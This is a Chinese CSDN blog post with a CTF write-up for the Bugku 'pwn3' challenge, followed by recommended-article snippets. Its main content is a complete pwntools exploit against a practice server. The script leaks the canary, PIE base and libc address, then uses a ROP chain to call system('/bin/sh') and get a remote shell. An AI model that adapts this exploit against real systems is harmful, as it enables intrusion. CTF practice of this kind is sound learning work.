bugku pwn3

最新推荐文章于 2023-04-01 18:28:56 发布
最新推荐文章于 2023-04-01 18:28:56 发布
阅读量759 收藏
点赞数
分类专栏: 题目 学习 文章标签: pwn bugku
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/102510656
版权

这道题不算太难多次返回main函数就可以了,第一次就leak出canary然后修改最低位就可以返回main函数第二次我们leak出程序的基址再次返回main函数第三次函数我们泄露出libc最后一次返回main函数我们就可以getshell了
exp:

from pwn import *
from LibcSearcher import *
#p=process('./read_note')
p=remote('114.116.54.89',10000)
elf=ELF('./read_note')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
def debug():
	gdb.attach(p)
#debug()
#leak canary
pop_rdi=0xe03
p.recvuntil('path:')
p.sendline('flag1')
p.recvuntil('note len:')
p.sendline('800')
payload='a'*600
p.sendline(payload)
p.recvuntil('aaaaaaaaa\n')
canary=u64('\x00'+p.recv(7))
log.success('canary: '+hex(canary))
p.recvuntil('note(len is 624)')
#debug()
payload='a'*600+p64(canary)+p64(1)+'\x20'
#pause()
#leak elf low_address
p.send(payload)
p.recvuntil('path:')
p.sendline('flag1')
p.recvuntil('note len:')
p.sendline('800')
payload='a'*615  #sendline+'\x0a'
#debug()
p.sendline(payload)
p.recvuntil('aaaaaaaaa\n')
main_e=u64(p.recv(6)+'\x00\x00')
base=main_e-0xd2e
log.success('base: '+hex(base))
p.recvuntil('24)')
payload='a'*600+p64(canary)+p64(0)+p64(base+0xd20)
p.send(payload)
p.recvuntil('path:')
p.sendline('flag1')
p.recvuntil('len:')
p.sendline('800')
payload='a'*600+p64(canary)+p64(1)+p64(pop_rdi+base)+p64(elf.got['puts']+base)+p64(elf.plt['puts']+base)+p64(base+0xd20)
p.sendline(payload)
#debug()
pause()
payload='a'*600+p64(canary)+p64(0)+p64(pop_rdi+base)
p.send(payload)
put_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
#libc=LibcSearcher('puts',put_addr)
system_addr=libc.symbols['system']+put_addr-libc.symbols['puts']
bin_sh=libc.search('/bin/sh').next()+put_addr-libc.symbols['puts']
p.sendline('flag1')
p.recvuntil('len:')
p.sendline('800')
payload='a'*600+p64(canary)+p64(0)+p64(base+pop_rdi)+p64(bin_sh)+p64(system_addr)+p64(base+0xd20)
p.sendline(payload)
payload='a'*600+p64(canary)+p64(1)+p64(pop_rdi+base)
p.send(payload)
p.interactive()
doudoudedi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bugku pwn libc
09-03
bugku pwn3pwn5用到的libc文件,原题目中没有给出libc文件,也不容易获取libc版本
Bugku pwn3
BengDouLove的博客
03-09 361
这道题保护机制全都是开启的 这个程序意思是一开始让你选择一个无关紧要的文件,打开这个文件之后读取文件内容打印,然后就是用户的输入 先输入要输入的内容有多长,之后写入thinking_note,这里thinking_note大小是固定的,所以这里造成栈溢出, 下一步判断是否624个字,也没啥用,好像每次都不对然后进入if,这里又可以读取0x270的内容 这里读入1000 在第一个read的...
[BugkuCTF] PWN3
BurYiA的博客
11-06 785
PWN3 历经千辛万苦终于把这道题拿下了,不容易啊/哭 特此前来记录一下 题目拿到后我们首先checksec一下 保护全开啊有莫有,但是不慌(我承认我看到的时候慌了),继续分析吧 粗略的看一下可以发现有四个输入点(红),并且还有一个返回输入值的输出点(粉) ok,上ida瞅瞅,main函数没啥好说的,我们瞅瞅vul函数 显然我们可以利用那两个read来搞一下事情,他们都是都thinking_not...
bugku-pwn3
playmaker的博客
06-04 1656
程序是一个保护全关的64位程序,主逻辑如下 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { char s; // [rsp+0h] [rbp-10h] memset(&s, 0, 0x10uLL); setvbuf(stdout, 0LL, 2, 0LL); setvbuf(stdin, 0LL, 1...
bugku pwn1
PRCORANGE的博客
04-13 213
题目: nc 114.67.246.176 10846 nc:全称Netcat,用于连接远程服务器端口。连接后它会返回一个cmdshell用于执行命令(Linux自带该命令)。 在linux中连接服务器,再使用ls查看目录 cat flag
bugku pwn题libc
11-06
bugku pwn题libc,pwn3做题时可在里面查找system、binsh等
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
2024NKCTF-pwn
最新发布
03-25
2024NKCTF_pwn
bugku-pwn-瑞士军刀 overflow2
m0_57954651的博客
01-13 1370
在klai中使用file命令查看文件类型 可以看到是64位。system函数的地址是0×40043F。使用IDA 64 Pro打开文件 查看主函数。利用Kali连接 ls查看。给了个nc和文件 下载。
bugku-pwn-wp
令则
03-27 449
bugku 文章目录bugkupwn1pwn2pwn3pwn4pwn5 pwn1 这个是典型的新手题了,nc连上去就有shell, 直接可以拿到flag。 pwn2 main函数 这里我们看到read函数位置会出现一个典型的栈溢出。 然后我们计算下溢出位置到返回值之间的距离,就可以控制程序流程了, 接下来我们看到函数中存在一个get_shell_函数: 然后就可以着手写exp,这里简单写下pa...
Bugku pwn4 WP
至臻求学,胸怀云月
02-18 709
下载地址 url checksec [*] '/mnt/hgfs/ubuntu_share/pwn/wiki/pwn4' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x4...
Bugku PWN Easy_int
JEWSWS的博客
04-01 369
【春风不解语,独做狮子吟。】
Bugku pwn4
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
10-24 278
准备: 可以看到程序没有开任何的保护 运行测试了一下,有一个输入数据的点 IDA 定位到主函数,很明显这里的 s 可以作为溢出的点 浏览了一下找到了system函数,kaix… 找找rop点,查看一下字符串 刚开始也很懵逼,找了一下/bin/bash 没找到,去看了wp,原来这里的$0也是可以利用的,system('/bin/bash')和system('$0')的效果是一样的。 这样我们就可以借用'$0'来溢出拿到shell OK现在我们有...
Bugku pwn5
BengDouLove的博客
02-28 585
我怀着沉重的心情写这个blog,在我做出这道题之前费劲了千辛万苦,花了三天时间,思考加发呆加询问… 菜就不用说了。 好好记录一下吧。 代码中存在格式化字符串漏洞,具体运行起来是这样 这是第一个坑,%x与%p是有区别的,x输出四个字节,p输出八个字节,这是64位的程序,所以地址应该大于四个字节了。 之前一直用的%x最后泄露出来的地址不对,也很难发现。 (菜+1) 为什么是%11$p呢,这要从pri...
[BUGKU] [PWN] PWN2
Stan冲冲冲
05-18 273
[BUGKU] [PWN] PWN2 先下载文件,拉入UBUNTU,checksec检查一下 checksec pwn2 发现啥都没开,最重要的是架构是amd64 在windows里把pwn2拉入64位ida 按F5切换到伪C 注意这句话 read(0, &s, 0x100uLL); 常见的缓冲区漏洞 按shift+f12查看字符串 发现有一个cat flag 按x发现交叉引用 .text:0000000000400769 mov edi, offs
BugKu - pwn2
Casuall的博客
07-06 3679
这道题来自于bugku旧平台的第二道pwn题,还是比较简单的,一个典型的缓冲区溢出题。 首先查看一下文件类型,file pwn2,可以看到是64位的程序。然后用64位IDA打开,查看程序的逻辑。 可以看到这个程序的逻辑比较简单,有一个read函数,这个函数一个危险函数,可能引发缓冲区溢出漏洞。常见的危险函数还有gets、strcpy、sprintf、scanf等。 然后查看字符串,看看是否有内置...
bugku pwn5
发蝴蝶和大脑斧的博客
07-17 1612
参考writeup 首先发现第一次输入存在格式化字符串漏洞,泄露出栈上的__libc_start_main。这个是在start函数中入栈的,应该是每个程序都会进入main函数之前进行的操作。__libc_start_main是libc中的函数,可以泄露出加载libc的基地址。然后就是找服务器system地址和binsh地址,通过gadget赋值。 # -*- coding: utf-8 -*- f...
python3下载pwn
12-27
在Python 3中下载pwn模块,你可以使用pip3来安装。以下是安装pwn模块的步骤: 1. 打开终端。 2. 运行以下命令来安装pwn模块: ```shell pip3 install pwntools ``` 这将会自动下载并安装pwn模块。 安装完成后,你就可以在Python 3中使用pwn模块了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值